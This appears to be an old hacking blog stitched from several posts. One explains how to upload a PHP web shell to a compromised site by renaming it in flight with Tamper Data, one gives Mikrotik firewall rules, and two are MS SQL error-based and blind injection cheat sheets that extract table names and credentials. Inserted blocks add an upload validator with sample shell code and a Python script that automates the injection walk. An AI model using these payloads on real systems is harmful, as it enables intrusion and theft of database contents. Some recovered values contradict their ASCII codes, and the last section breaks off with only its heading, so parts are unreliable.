Uploading a PHP shell with Tamper Data
07 Jan 2012
in hacking Tags: web shell, webshell
Many of you probably already know what a webshell is. A webshell (PHP shell) is a PHP-based application that a user runs to interact with the server's operating system; a web shell is simply a shell written in a web programming language (R57, C99 and the like) that makes exploring a site with a bug easier.
To upload a PHP shell we usually look for an upload feature that accepts .php files. The question is: what if the feature only accepts .jpg? That is the technique I am sharing here. The steps are below, on the assumption that you have already compromised the target website through SQL injection, LFI/RFI or an exploit.
1. Prepare a shell.php file first, e.g. C99Shell, r57 or b374k.
2. Rename it to shell.php.jpg.
3. Install the Tamper Data add-on in Firefox.
4. Restart the browser and begin the upload.
5. Find the image upload feature on the target site, then start Tamper Data.
6. Upload your shell.php.jpg and choose to tamper the request.
7. Right after you submit, with Tamper Data running, wait for the Tamper Data pop-up, find shell.php.jpg in the request and rename the shell.php.jpg filename to shell.php. Remember that!
Now you only have to find where your shell file ended up.
Open the path to shell.php in the browser URL bar and you are ready to go. Remember, though, that not every target can be handled this way: the trick only defeats a file-type check that runs in the browser before the request is sent, because Tamper Data edits the multipart filename after that check has already passed. A check performed on the server sees the renamed shell.php and rejects it. If it does not work, just ask the admin directly.
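The server-side check that the Tamper Data trick above cannot bypass, written out as an added example (this is not code from the original post): it decides on the filename and bytes the server actually received, rejects double extensions such as shell.php.jpg outright (Apache with an AddHandler for .php treats every extension in a name as meaningful, so the double extension is dangerous even before renaming), and never lets the client's name reach the filesystem. The allowed extensions, magic bytes and forbidden markers are assumptions chosen for the example.

```python
import os
import re
import secrets
from typing import Tuple

# Added example. Extension -> magic bytes the file must start with (assumed set).
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# PHP/script openers have no business inside an image; a shell padded with a
# fake JPEG header still carries these (assumed marker list).
FORBIDDEN_MARKERS = (b"<?php", b"<?=", b"<script")

# Exactly one dot, short alphanumeric stem and extension. "shell.php.jpg" fails here.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}$")


def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) based only on what the server received.

    The browser's opinion of the file type is never consulted, so editing the
    request in flight (Tamper Data, a proxy) changes nothing here.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    if not SAFE_NAME.match(base):
        return False, "bad filename"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match extension"
    if any(marker in data for marker in FORBIDDEN_MARKERS):
        return False, "script markers inside image"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Server-chosen name: random stem plus the validated extension only.

    Call this after check_upload() accepted the file; the client's name is
    discarded, so nothing the uploader controls becomes a path component.
    """
    ext = os.path.basename(filename).rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample uploads: the renamed shell, the double-extension
    # shell, a shell behind a JPEG header, and a plain image.
    samples = [
        ("shell.php", b"<?php system($_GET['c']); ?>"),
        ("shell.php.jpg", b"<?php system($_GET['c']); ?>"),
        ("photo.jpg", b"\xff\xd8\xff\xe0<?php phpinfo(); ?>"),
        ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    ]
    for name, body in samples:
        print(name, check_upload(name, body))
```

Store accepted files outside the web root or in a directory where the web server has script execution disabled; the name check above is the first layer, not the only one.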
Dealing with NetCut, MAC cloning, Conficker and spam with Mikrotik RouterOS
02 Jan 2012
in Mikrotik
OK, straight to the point. This time I am sharing a set of Mikrotik RouterOS firewall rules for problems that commonly turn up on hotspot networks such as RT/RW-net: the tricks attackers use to get free internet access, plus the virus, spam and DDoS traffic that disrupts the network and wears out the admin who has to deal with it... hahaha...
To keep it short, just run the following commands in your Mikrotik terminal!
/ip firewall filter add action=accept chain=input comment="default configuration (anti netcut, default is accept)" disabled=no protocol=icmp
ANTI-CONFICKER
/ip firewall filter
add chain=forward protocol=udp src-port=135-139 action=drop comment=";;Block W32.Kido - Conficker" disabled=no
add chain=forward protocol=udp dst-port=135-139 action=drop comment="" disabled=no
add chain=forward protocol=udp src-port=445 action=drop comment="" disabled=no
add chain=forward protocol=udp dst-port=445 action=drop comment="" disabled=no
add chain=forward protocol=tcp src-port=135-139 action=drop comment="" disabled=no
add chain=forward protocol=tcp dst-port=135-139 action=drop comment="" disabled=no
add chain=forward protocol=tcp src-port=445 action=drop comment="" disabled=no
add chain=forward protocol=tcp dst-port=445 action=drop comment="" disabled=no
add chain=forward protocol=tcp dst-port=4691 action=drop comment="" disabled=no
add chain=forward protocol=tcp dst-port=5933 action=drop comment="" disabled=no
add chain=forward protocol=udp dst-port=5355 action=drop comment="Block LLMNR" disabled=no
add chain=forward protocol=udp dst-port=4647 action=drop comment="" disabled=no
add action=drop chain=forward comment="SMTP Deny" disabled=no protocol=tcp src-port=25
add action=drop chain=forward comment="" disabled=no dst-port=25 protocol=tcp
BLOCK SPAM
/ip firewall filter add chain=forward dst-port=135-139 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=135-139 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=445 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=445 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=593 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=4444 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=5554 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=9996 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=995-999 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=53 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=55 protocol=tcp action=drop
Note: the TCP/53 rule also drops legitimate DNS over TCP from clients (answers too large for UDP fall back to TCP). It only makes sense if every client resolves through the router itself, since that traffic hits the input chain, not forward.
ANTI NETCUT
Note: NetCut works by ARP spoofing on the local segment, which IP-layer filter rules never see; the rules below only allow TCP from the listed public ranges to reach the router itself.
/ip firewall filter
add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 protocol=tcp src-address=61.213.183.1-61.213.183.254
add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 protocol=tcp src-address=67.195.134.1-67.195.134.254
add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 protocol=tcp src-address=68.142.233.1-68.142.233.254
add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 protocol=tcp src-address=68.180.217.1-68.180.217.254
add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 protocol=tcp src-address=203.84.204.1-203.84.204.254
add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 protocol=tcp src-address=69.63.176.1-69.63.176.254
add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 protocol=tcp src-address=69.63.181.1-69.63.181.254
add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 protocol=tcp src-address=63.245.209.1-63.245.209.254
add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 protocol=tcp src-address=63.245.213.1-63.245.213.254
add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 protocol=tcp src-address=173.203.196.1-173.203.196.254
ANTI PORT SCAN
/ip firewall filter
add chain=input protocol=tcp psd=21,3s,3,1 action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="Port scanners to list" disabled=no
add chain=input protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="NMAP FIN Stealth scan"
add chain=input protocol=tcp tcp-flags=fin,syn action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="SYN/FIN scan"
add chain=input protocol=tcp tcp-flags=syn,rst action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="SYN/RST scan"
add chain=input protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="FIN/PSH/URG scan"
add chain=input protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="ALL/ALL scan"
add chain=input protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="NMAP NULL scan"
add chain=input src-address-list="port scanners" action=drop comment="dropping port scanners" disabled=no
===========================================
ADDITIONAL (FTP brute-force protection)
Remember, the order below must be exact; the rules must not be swapped around.
/ip firewall filter
add chain=input in-interface=ether1 protocol=tcp dst-port=21 src-address-list=ftp_blacklist action=drop
# accept 10 incorrect logins per minute
/ip firewall filter
add chain=output action=accept protocol=tcp content="530 Login incorrect" dst-limit=1/1m,9,dst-address/1m
# add to blacklist
/ip firewall filter
add chain=output action=add-dst-to-address-list protocol=tcp content="530 Login incorrect" address-list=ftp_blacklist address-list-timeout=3h
==================================================
Microsoft SQL Error Exploit
31 Dec 2011
ERROR SQL INJECTION - DETECTION
Integer injection:
http://[site]/page.asp?id=1 having 1=1--
String injection:
http://[site]/page.asp?id=x' having 1=1--
Error returned: Column '[COLUMN NAME]' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

ERROR SQL INJECTION - EXTRACT DATABASE USER
http://[site]/page.asp?id=1 or 1=convert(int,(USER))--
Error returned: Syntax error converting the nvarchar value '[DB USER]' to a column of data type int.

ERROR SQL INJECTION - EXTRACT DATABASE NAME
http://[site]/page.asp?id=1 or 1=convert(int,(DB_NAME()))--
Error returned: Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.

ERROR SQL INJECTION - EXTRACT DATABASE VERSION
http://[site]/page.asp?id=1 or 1=convert(int,(@@VERSION))--
Error returned: Syntax error converting the nvarchar value '[DB VERSION]' to a column of data type int.

ERROR SQL INJECTION - EXTRACT SERVER NAME
http://[site]/page.asp?id=1 or 1=convert(int,(@@SERVERNAME))--
Error returned: Syntax error converting the nvarchar value '[SERVER NAME]' to a column of data type int.

ERROR SQL INJECTION - EXTRACT 1st DATABASE TABLE
(char(85) is 'U', user tables, written without quotes)
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))--
Error returned: Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.

ERROR SQL INJECTION - EXTRACT 2nd DATABASE TABLE
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and name>'TABLE-NAME-1'))--
Error returned: Syntax error converting the nvarchar value '[TABLE NAME 2]' to a column of data type int.

ERROR SQL INJECTION - EXTRACT 3rd DATABASE TABLE
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and name>'TABLE-NAME-2'))--
Error returned: Syntax error converting the nvarchar value '[TABLE NAME 3]' to a column of data type int.
Note: TOP 1 without ORDER BY is not guaranteed to return the smallest matching name; add "order by name" inside the subquery to make the walk deterministic.

ERROR SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME
(if the database name contains characters such as '-', bracket it: [DB-NAME].information_schema.columns)
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))--
Error returned: Syntax error converting the nvarchar value '[COLUMN NAME 1]' to a column of data type int.

ERROR SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-1'))--
Error returned: Syntax error converting the nvarchar value '[COLUMN NAME 2]' to a column of data type int.

ERROR SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-2'))--
Error returned: Syntax error converting the nvarchar value '[COLUMN NAME 3]' to a column of data type int.

ERROR SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))--
Error returned: Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a column of data type int.

ERROR SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-2 from TABLE-NAME-1))--
Error returned: Syntax error converting the nvarchar value '[FIELD 2 VALUE]' to a column of data type int.

ERROR SQL INJECTION - EXTRACT 3rd FIELD OF 1st ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-3 from TABLE-NAME-1))--
Error returned: Syntax error converting the nvarchar value '[FIELD 3 VALUE]' to a column of data type int.

ERROR SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 not in ('FIELD-1-VALUE') order by COLUMN-NAME-1 desc))--
Error returned: Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 2ND ROW]' to a column of data type int.

ERROR SQL INJECTION - EXTRACT 1st FIELD OF 3rd ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 not in ('FIELD-1-VALUE','FIELD-2-VALUE') order by COLUMN-NAME-1 desc))--
Error returned: Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 3RD ROW]' to a column of data type int.
Note: exclude every value already recovered, not only the previous one; with the descending sort, excluding only FIELD-2-VALUE returns FIELD-1-VALUE again whenever it sorts above FIELD-2-VALUE.
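The table walk above (one name per request, bounded by the previous name) and the error message that carries the value back lend themselves to a small driver. The following is an added example, not code from the original post: it builds the payloads for the sysobjects and information_schema walks with an explicit "order by" so the walk is deterministic, pulls the value out of the SQL Server conversion error, and is exercised against a constructed fake_server() that answers the way a SQL Server 2000 backend with three user tables would. The HTTP transport is left out; the same `name>'previous'` pagination serves the UNION technique further down, with the value read from the page instead of the error.

```python
import re
from typing import Callable, List, Optional

# Added example. The conversion error the cheat sheet relies on; older and newer
# SQL Server versions word it slightly differently, the type word is optional.
ERROR_RE = re.compile(
    r"Syntax error converting the n?varchar value '([^']*)' to a column of data type int"
)


def table_payload(prev: Optional[str] = None) -> str:
    """Payload for the next user table after `prev` (None = first table)."""
    where = "xtype=char(85)"  # 'U' = user tables, written without quotes
    if prev is not None:
        where += f" and name>'{prev}'"
    return f"1 or 1=convert(int,(select top 1 name from sysobjects where {where} order by name))--"


def column_payload(db: str, table: str, prev: Optional[str] = None) -> str:
    """Payload for the next column of `table` after `prev`; db is bracketed so
    names such as PRO-DB-1 work."""
    where = f"table_name='{table}'"
    if prev is not None:
        where += f" and column_name>'{prev}'"
    return (
        f"1 or 1=convert(int,(select top 1 column_name from [{db}].information_schema.columns "
        f"where {where} order by column_name))--"
    )


def parse_error(body: str) -> Optional[str]:
    """Value leaked in the conversion error, or None when the page rendered normally."""
    m = ERROR_RE.search(body)
    return m.group(1) if m else None


def walk_tables(send: Callable[[str], str]) -> List[str]:
    """send(payload) -> response body. Walks user tables in name order until a
    request comes back without the error (no row matched)."""
    names: List[str] = []
    prev = None
    while True:
        value = parse_error(send(table_payload(prev)))
        if value is None or value in names:
            return names
        names.append(value)
        prev = value


# Constructed stand-in for the vulnerable page: a database with three user tables.
_FAKE_TABLES = sorted(["USERS", "ORDERS", "CUSTOMERS"])


def fake_server(payload: str) -> str:
    """Answer table_payload() as the real page would: conversion error while a
    row matches, a normal page once nothing sorts after the bound."""
    m = re.search(r"name>'([^']*)'", payload)
    bound = m.group(1) if m else ""
    rows = [t for t in _FAKE_TABLES if t > bound]
    if not rows:
        return "<html>page rendered normally</html>"
    return (
        "<html>Microsoft OLE DB Provider for SQL Server error '80040e07'<br>"
        f"Syntax error converting the nvarchar value '{rows[0]}' to a column of data type int.</html>"
    )


if __name__ == "__main__":
    print(walk_tables(fake_server))  # walks CUSTOMERS, ORDERS, USERS against the fake
```

Against a real target, send() is an HTTP GET of page.asp?id=&lt;payload&gt; that returns the body; everything else stays the same.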
Microsoft SQL Blind Exploit
31 Dec 2011
BLIND SQL INJECTION - DETECTION
Integer injection:
http://[site]/page.asp?id=1; WAITFOR DELAY '00:00:10'-- (+10 seconds)
String injection:
http://[site]/page.asp?id=x'; WAITFOR DELAY '00:00:10'-- (+10 seconds)
In everything below, only the requests marked (+10 seconds) were delayed, i.e. the condition was true; the others returned at once.

BLIND SQL INJECTION - EXTRACT DATABASE USER
Total characters (3):
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)
1st character (D):
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
2nd character (B): same procedure on substring((USER),2,1)
3rd character (O): same procedure on substring((USER),3,1)
Database user = DBO

BLIND SQL INJECTION - EXTRACT DATABASE NAME
http://[site]/page.asp?id=1; IF (LEN(DB_NAME())=8) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),1,1)))=112) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),3,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),4,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),5,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),6,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),7,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),8,1)))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Database name = PRO-DB-1

BLIND SQL INJECTION - EXTRACT 1st DATABASE TABLE
(the subquery needs its own parentheses inside LEN(); names come back in collation order, so the walk here is CUSTOMERS, ORDERS, USERS)
http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 NAME from sysobjects where xtype=char(85)))=9) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=99) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),4,1)))=116) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),6,1)))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),7,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),8,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),9,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Table name = CUSTOMERS

BLIND SQL INJECTION - EXTRACT 2nd DATABASE TABLE
http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'CUSTOMERS'))=6) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'CUSTOMERS'),1,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'CUSTOMERS'),2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'CUSTOMERS'),3,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'CUSTOMERS'),4,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'CUSTOMERS'),5,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'CUSTOMERS'),6,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Table name = ORDERS

BLIND SQL INJECTION - EXTRACT 3rd DATABASE TABLE
http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'))=5) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),1,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),2,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),4,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),5,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Table name = USERS

BLIND SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME
(the database name contains '-', so it is bracketed; columns come back in collation order: ID, PASS, USER)
http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS'))=2) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS'),1,1)))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS'),2,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Column name = ID

BLIND SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME
http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'ID'))=4) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'ID'),1,1)))=112) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'ID'),2,1)))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'ID'),3,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'ID'),4,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Column name = PASS

BLIND SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME
http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'PASS'))=4) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'PASS'),1,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'PASS'),2,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'PASS'),3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'PASS'),4,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Column name = USER

BLIND SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW
http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 USER from USERS))=5) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),1,1))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),2,1))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),3,1))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),4,1))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),5,1))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field data = ADMIN

BLIND SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW
http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 PASS from USERS))=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),1,1))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),2,1))=50) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),3,1))=51) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field data = 123

BLIND SQL INJECTION - EXTRACT 3rd FIELD OF 1st ROW
http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 ID from USERS))=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID from USERS),1,1))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID from USERS),2,1))=48) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID from USERS),3,1))=48) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field data = 100

BLIND SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW
